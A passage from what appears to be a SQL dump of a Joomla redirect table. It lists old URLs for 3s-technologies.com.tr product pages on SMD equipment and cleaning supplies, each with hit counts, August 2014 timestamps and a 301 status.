00:00:00',301),(3428,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',2,0,'2014-08-17 21:17:58','0000-00-00 00:00:00',301),(3429,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',2,0,'2014-08-17 21:21:45','0000-00-00 00:00:00',301),(3430,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',2,0,'2014-08-17 21:22:17','0000-00-00 00:00:00',301),(3431,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',97,0,'2014-08-17 21:24:47','0000-00-00 00:00:00',301),(3432,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',1,0,'2014-08-17 21:25:58','0000-00-00 00:00:00',301),(3433,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',10,0,'2014-08-17 21:42:36','0000-00-00 00:00:00',301),(3434,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',8,0,'2014-08-17 21:47:13','0000-00-00 00:00:00',301),(3435,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161','','','',1,0,'2014-08-17 22:05:39','0000-00-00 00:00:00',301),(3436,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',2,0,'2014-08-17 22:28:34','0000-00-00 00:00:00',301),(3437,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',89,0,'2014-08-17 22:35:45','0000-00-00 00:00:00',301),(3438,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',1,0,'2014-08-17 22:39:18','0000-00-00 00:00:00',301),(3439,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-08-17 22:40:40','0000-00-00 00:00:00',301),(3440,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',10,0,'2014-08-17 22:48:08','0000-00-00 00:00:00',301),(3441,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',3,0,'2014-08-17 22:57:28','0000-00-00 00:00:00',301),(3442,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',6,0,'2014-08-17 23:04:01','0000-00-00 00:00:00',301),(3443,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',5,0,'2014-08-17 23:07:42','0000-00-00 00:00:00',301),(3444,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',85,0,'2014-08-17 23:12:37','0000-00-00 00:00:00',301),(3445,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-17 23:16:18','0000-00-00 00:00:00',301),(3446,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',3,0,'2014-08-17 23:17:33','0000-00-00 00:00:00',301),(3447,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-08-17 23:20:35','0000-00-00 00:00:00',301),(3448,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',3,0,'2014-08-17 23:21:16','0000-00-00 00:00:00',301),(3449,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160','','','',1,0,'2014-08-17 23:23:37','0000-00-00 00:00:00',301),(3450,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',6,0,'2014-08-17 23:42:07','0000-00-00 00:00:00',301),(3451,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157','','','',1,0,'2014-08-17 23:49:30','0000-00-00 00:00:00',301),(3452,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58','','','',4,0,'2014-08-17 23:50:42','0000-00-00 00:00:00',301),(3453,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',2,0,'2014-08-18 00:03:03','0000-00-00 00:00:00',301),(3454,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',2,0,'2014-08-18 00:08:22','0000-00-00 00:00:00',301),(3455,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',3,0,'2014-08-18 00:11:13','0000-00-00 00:00:00',301),(3456,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',3,0,'2014-08-18 00:13:40','0000-00-00 00:00:00',301),(3457,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',2,0,'2014-08-18 00:14:53','0000-00-00 00:00:00',301),(3458,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',3,0,'2014-08-18 00:16:07','0000-00-00 00:00:00',301),(3459,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',2,0,'2014-08-18 00:21:00','0000-00-00 00:00:00',301),(3460,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',4,0,'2014-08-18 00:23:51','0000-00-00 00:00:00',301),(3461,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',3,0,'2014-08-18 00:25:54','0000-00-00 00:00:00',301),(3462,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',4,0,'2014-08-18 00:29:10','0000-00-00 00:00:00',301),(3463,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',90,0,'2014-08-18 00:32:31','0000-00-00 00:00:00',301),(3464,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',2,0,'2014-08-18 00:33:42','0000-00-00 00:00:00',301),(3465,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158','','','',1,0,'2014-08-18 00:37:23','0000-00-00 00:00:00',301),(3466,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',2,0,'2014-08-18 00:43:01','0000-00-00 00:00:00',301),(3467,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',2,0,'2014-08-18 00:49:57','0000-00-00 00:00:00',301),(3468,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',2,0,'2014-08-18 00:51:35','0000-00-00 00:00:00',301),(3469,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',2,0,'2014-08-18 00:54:26','0000-00-00 00:00:00',301),(3470,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',2,0,'2014-08-18 00:54:51','0000-00-00 00:00:00',301),(3471,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',2,0,'2014-08-18 00:56:30','0000-00-00 00:00:00',301),(3472,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',1,0,'2014-08-18 00:57:03','0000-00-00 00:00:00',301),(3473,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',2,0,'2014-08-18 00:57:17','0000-00-00 00:00:00',301),(3474,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',117,0,'2014-08-18 01:00:08','0000-00-00 00:00:00',301),(3475,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',4,0,'2014-08-18 01:00:33','0000-00-00 00:00:00',301),(3476,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',92,0,'2014-08-18 01:00:57','0000-00-00 00:00:00',301),(3477,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',9,0,'2014-08-18 01:02:02','0000-00-00 00:00:00',301),(3478,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',89,0,'2014-08-18 01:02:12','0000-00-00 00:00:00',301),(3479,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',2,0,'2014-08-18 01:04:38','0000-00-00 00:00:00',301),(3480,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',89,0,'2014-08-18 01:06:42','0000-00-00 00:00:00',301),(3481,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',4,0,'2014-08-18 01:08:42','0000-00-00 00:00:00',301),(3482,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',4,0,'2014-08-18 01:17:58','0000-00-00 00:00:00',301),(3483,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2','','','',2,0,'2014-08-18 01:33:55','0000-00-00 00:00:00',301),(3484,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',2,0,'2014-08-18 01:57:16','0000-00-00 00:00:00',301),(3485,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',33,0,'2014-08-18 02:06:28','0000-00-00 00:00:00',301),(3486,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',2,0,'2014-08-18 02:30:58','0000-00-00 00:00:00',301),(3487,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',1,0,'2014-08-18 02:40:15','0000-00-00 00:00:00',301),(3488,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',4,0,'2014-08-18 02:57:27','0000-00-00 00:00:00',301),(3489,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',3,0,'2014-08-18 03:12:13','0000-00-00 00:00:00',301),(3490,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',2,0,'2014-08-18 03:53:02','0000-00-00 00:00:00',301),(3491,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',3,0,'2014-08-18 04:20:53','0000-00-00 00:00:00',301),(3492,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125','','','',3,0,'2014-08-18 04:22:07','0000-00-00 00:00:00',301),(3493,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',6,0,'2014-08-18 04:24:34','0000-00-00 00:00:00',301),(3494,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',2,0,'2014-08-18 04:29:41','0000-00-00 00:00:00',301),(3495,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161','','','',1,0,'2014-08-18 04:33:12','0000-00-00 00:00:00',301),(3496,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',3,0,'2014-08-18 04:35:15','0000-00-00 00:00:00',301),(3497,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',6,0,'2014-08-18 04:41:46','0000-00-00 00:00:00',301),(3498,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',2,0,'2014-08-18 05:11:57','0000-00-00 00:00:00',301),(3499,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',11,0,'2014-08-18 05:14:18','0000-00-00 00:00:00',301),(3500,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',11,0,'2014-08-18 05:15:37','0000-00-00 00:00:00',301),(3501,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',3,0,'2014-08-18 05:16:51','0000-00-00 00:00:00',301),(3502,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',2,0,'2014-08-18 05:18:05','0000-00-00 00:00:00',301),(3503,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',5,0,'2014-08-18 05:29:08','0000-00-00 00:00:00',301),(3504,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113','','','',1,0,'2014-08-18 05:30:23','0000-00-00 00:00:00',301),(3505,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',2,0,'2014-08-18 05:31:10','0000-00-00 00:00:00',301),(3506,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',2,0,'2014-08-18 05:36:32','0000-00-00 00:00:00',301),(3507,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',3,0,'2014-08-18 05:36:39','0000-00-00 00:00:00',301),(3508,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',3,0,'2014-08-18 05:37:44','0000-00-00 00:00:00',301),(3509,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',6,0,'2014-08-18 05:41:34','0000-00-00 00:00:00',301),(3510,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',10,0,'2014-08-18 05:42:40','0000-00-00 00:00:00',301),(3511,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87','','','',3,0,'2014-08-18 05:47:37','0000-00-00 00:00:00',301),(3512,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',2,0,'2014-08-18 06:02:44','0000-00-00 00:00:00',301),(3513,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140','','','',3,0,'2014-08-18 06:04:04','0000-00-00 00:00:00',301),(3514,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',5,0,'2014-08-18 06:04:31','0000-00-00 00:00:00',301),(3515,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-08-18 06:06:29','0000-00-00 00:00:00',301),(3516,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',1,0,'2014-08-18 06:09:38','0000-00-00 00:00:00',301),(3517,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',1,0,'2014-08-18 06:11:33','0000-00-00 00:00:00',301),(3518,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113','','','',2,0,'2014-08-18 06:13:51','0000-00-00 00:00:00',301),(3519,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',3,0,'2014-08-18 06:21:16','0000-00-00 00:00:00',301),(3520,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',3,0,'2014-08-18 06:26:50','0000-00-00 00:00:00',301),(3521,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',5,0,'2014-08-18 06:43:34','0000-00-00 00:00:00',301),(3522,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163','','','',4,0,'2014-08-18 07:03:01','0000-00-00 00:00:00',301),(3523,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',7,0,'2014-08-18 07:04:16','0000-00-00 00:00:00',301),(3524,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',4,0,'2014-08-18 07:11:29','0000-00-00 00:00:00',301),(3525,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',6,0,'2014-08-18 07:14:00','0000-00-00 00:00:00',301),(3526,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',2,0,'2014-08-18 07:15:14','0000-00-00 00:00:00',301),(3527,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',6,0,'2014-08-18 07:28:12','0000-00-00 00:00:00',301),(3528,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',4,0,'2014-08-18 07:39:41','0000-00-00 00:00:00',301),(3529,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',5,0,'2014-08-18 07:56:05','0000-00-00 00:00:00',301),(3530,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125','','','',2,0,'2014-08-18 07:58:17','0000-00-00 00:00:00',301),(3531,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',1,0,'2014-08-18 07:59:13','0000-00-00 00:00:00',301),(3532,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113','','','',2,0,'2014-08-18 08:01:36','0000-00-00 00:00:00',301),(3533,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',1,0,'2014-08-18 08:01:48','0000-00-00 00:00:00',301),(3534,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',4,0,'2014-08-18 08:02:02','0000-00-00 00:00:00',301),(3535,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',1,0,'2014-08-18 08:09:12','0000-00-00 00:00:00',301),(3536,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',3,0,'2014-08-18 08:33:03','0000-00-00 00:00:00',301),(3537,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126&Itemid=133','','','',35,0,'2014-08-18 08:39:50','0000-00-00 00:00:00',301),(3538,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',5,0,'2014-08-18 08:46:19','0000-00-00 00:00:00',301),(3539,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',4,0,'2014-08-18 09:01:26','0000-00-00 00:00:00',301),(3540,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',1,0,'2014-08-18 09:01:52','0000-00-00 00:00:00',301),(3541,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',3,0,'2014-08-18 09:06:17','0000-00-00 00:00:00',301),(3542,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124','','','',1,0,'2014-08-18 09:07:03','0000-00-00 00:00:00',301),(3543,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137','','','',3,0,'2014-08-18 09:08:22','0000-00-00 00:00:00',301),(3544,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',2,0,'2014-08-18 09:09:12','0000-00-00 00:00:00',301),(3545,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101','','','',5,0,'2014-08-18 09:09:37','0000-00-00 00:00:00',301),(3546,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95','','','',5,0,'2014-08-18 09:10:27','0000-00-00 00:00:00',301),(3547,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',5,0,'2014-08-18 09:12:08','0000-00-00 00:00:00',301),(3548,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',4,0,'2014-08-18 09:12:32','0000-00-00 00:00:00',301),(3549,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',6,0,'2014-08-18 09:13:47','0000-00-00 00:00:00',301),(3550,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134','','','',3,0,'2014-08-18 09:14:13','0000-00-00 00:00:00',301),(3551,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',6,0,'2014-08-18 09:15:03','0000-00-00 00:00:00',301),(3552,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164','','','',2,0,'2014-08-18 09:16:42','0000-00-00 00:00:00',301),(3553,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',2,0,'2014-08-18 09:17:29','0000-00-00 00:00:00',301),(3554,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',2,0,'2014-08-18 09:18:23','0000-00-00 00:00:00',301),(3555,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',5,0,'2014-08-18 09:18:47','0000-00-00 00:00:00',301),(3556,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',1,0,'2014-08-18 09:20:02','0000-00-00 00:00:00',301),(3557,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',3,0,'2014-08-18 09:20:52','0000-00-00 00:00:00',301),(3558,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118','','','',4,0,'2014-08-18 09:21:17','0000-00-00 00:00:00',301),(3559,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',1,0,'2014-08-18 09:21:42','0000-00-00 00:00:00',301),(3560,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',7,0,'2014-08-18 09:33:44','0000-00-00 00:00:00',301),(3561,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',1,0,'2014-08-18 09:33:46','0000-00-00 00:00:00',301),(3562,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',6,0,'2014-08-18 09:36:31','0000-00-00 00:00:00',301),(3563,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',5,0,'2014-08-18 09:53:57','0000-00-00 00:00:00',301),(3564,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',1,0,'2014-08-18 09:54:26','0000-00-00 00:00:00',301),(3565,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',4,0,'2014-08-18 09:54:47','0000-00-00 00:00:00',301),(3566,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',6,0,'2014-08-18 